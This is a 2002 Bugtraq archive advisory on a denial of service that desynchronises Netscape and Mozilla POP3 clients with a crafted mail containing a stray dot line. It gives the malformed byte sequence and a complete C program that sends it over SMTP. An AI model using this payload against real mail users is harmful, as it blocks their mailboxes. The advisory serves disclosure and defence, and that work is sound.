Home page logo
/

bugtraq logo Bugtraq mailing list archives

Another small DoS on Mozilla <= 1.0 through pop3
From: eldre8 <eldre () afturgurluk org>
Date: 12 Jun 2002 19:00:49 -0000

////////////////////////////////////////////
///// Strange Software Behaviour Report
///
//// discovered, understood and exploited between 05, 08 2001
//// (yes, i took the time... :) )
///  eldre8
Wed Jun 12 20:47:59 CEST 2002

\/\/\_/-> System affected:
        Netscape v =<4.77
        Mozilla <1.1

^\/\/'\-> System not affected:
        Outlook Express 4.72.3110.5
        maybe the other versions of Outlook

|_/\/\\/> Buggy software team contacted about this:
        Yes, the bug is fixed now.

/\/\/\_/> Exploitation: remote & very easy & very anonymous :(

_/\/\/\_> Effects: With this remote hole, we can block any mail
        box that is checked with a pop3 client, so the
        hotmail, yahoo like servers are not affected.
        A mail will cause the pop3 client to desynchronize
        with the server, losing the connection to it, and
        so, leaves all messages on the server (explain later)...

-/\/\/\/> Explanation: In the SMTP protocol, we can send mail with
        some introduction command (ehlo,mail,rcpt) and then
        type our messages and place a dot at a new line to
        specify to the MTA that it is the end of the message.
        On the other side, when a POP3 client check mail, it
        connect to the server, retreive the mail, it terminate
        the download of a message when it sees a dot at a new line.
        And here is the trick.
        If we can place a dot at a new line, and place other
        words below this dot, the client will beleive the mail
        is finished and will try to download next messages, thus
        beiing desynchronize with the server...
        The POP3 client act as:
            login on to the POP3 server
            retrieve mails
            delete mails
            logout
        but if it is desynchronize, it will retreive mail, and
        disconnect, thus didn't delete mails, and the next time
        it login, it will refind the same mail, will retreive one
        more time the mails, disconnect, and other and other...
        A more detailed explanation,
        here it is a simple end of a normal mail:
            blabla...
            \x0a
            \x0a
        and this is the bad mail:
            blabla...
            \x0a\x0d\x2e\x0d\x20\x0a\x0a\x0a
            blabla...
            \x0a\x20\x00
            \x0a
        We can see at the end of the two 0x0a, it seems that it is just
        place here by the console...forget it.
        At this stage, you could catch the bug...

=\/\/\/-> Possible fixes: There are different ways to fix this,
        - one way is from the client, to stop the bad mail,
            this is to connect manually via telnet to the pop3
            server, and then identify the bad message and do a
            dele <# of the message>
        - one better way is to fix this from the client itself,
            the client can get the size of each messages via
            the list command, so it should be able to retrieve
            the complete message, not less, not more...
        - one way is to fix the MTA so it will not accept such
            the code below...

~\/\/\/~> (buggy:])Exploit:

/* this is the code that comes with my
 * advisory #1 to illustrate this...
 * eldre8 at afturgurluk (double dot minus one) org
 */

#include
#include
#include
#include
#include
#include
#include
#include

#define MX "localhost"
#define EHLO "EHLO mx\r\n"
#define MAIL "MAIL FROM: root () localhost\r\n"
#define RCPT "RCPT TO: root () localhost\r\n"
#define DATA "DATA\r\n"
#define QUIT "QUIT\r\n"

#define PORT 25

int sock;
char buffer[255];

void SigCatch() {
    fprintf(stderr, "\b\bbye!\n");
    close(sock);
    exit(0);
}

int main() {
    /* I was too lame to implement the command line... :) */
    int i;
    struct sockaddr_in sout;
    struct hostent *hp;

    signal(SIGINT, SigCatch);

    hp=gethostbyname(MX);
    sock=socket(AF_INET, SOCK_STREAM, 0);
    if (sock<0) {
        perror("sock");
        return -1;
    }

    sout.sin_family=AF_INET;
    sout.sin_port=htons(PORT);
    memcpy(&(sout.sin_addr), *(hp->h_addr_list), sizeof(struct in_addr));
    if (connect(sock, &sout, sizeof(sout))<0) {
        perror("connect");
        return -1;
    }
    recv(sock, buffer, 255, 0); /* receive the banner... */
    send(sock, EHLO, sizeof(EHLO), 0);
    recv(sock, buffer, 255, 0); /* receive the welcome message... */
    send(sock, MAIL, sizeof(MAIL), 0);
    recv(sock, buffer, 255, 0); /* receive the acknowledgement to mail from. */
    send(sock, RCPT, sizeof(RCPT), 0);
    recv(sock, buffer, 255, 0); /* idem, but for the rcpt to... */
    send(sock, DATA, sizeof(DATA), 0);
    recv(sock, buffer, 255, 0);
    i=sprintf(buffer, "b4d maIl 1n 4KT1oN!\n\x0a\x0d\x2e\x0d\x20\x0a\x0a\nblabla...\x0a\x20");
    *(buffer+i)="\x0";
    sprintf(buffer+i+1, "\n.\n");
    send(sock, buffer, i+1+3, 0); /* send the dumb thing ... */
    recv(sock, buffer, 255, 0);
    send(sock, QUIT, sizeof(QUIT), 0);
    recv(sock, buffer, 255, 0);
    close(sock);

    return 0;
}

=_-/\/`-> Greetz/Shouts:
    all who know me, and all that I forget here because of anonymity reason...
    especially french speaking boys & girls! ;)
    And special to anyone in search of knowledge and those who distribute
    knowledge.

You can find this report on: afturgurluk.org/~eldre8/files/pop3client_dos.txt


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]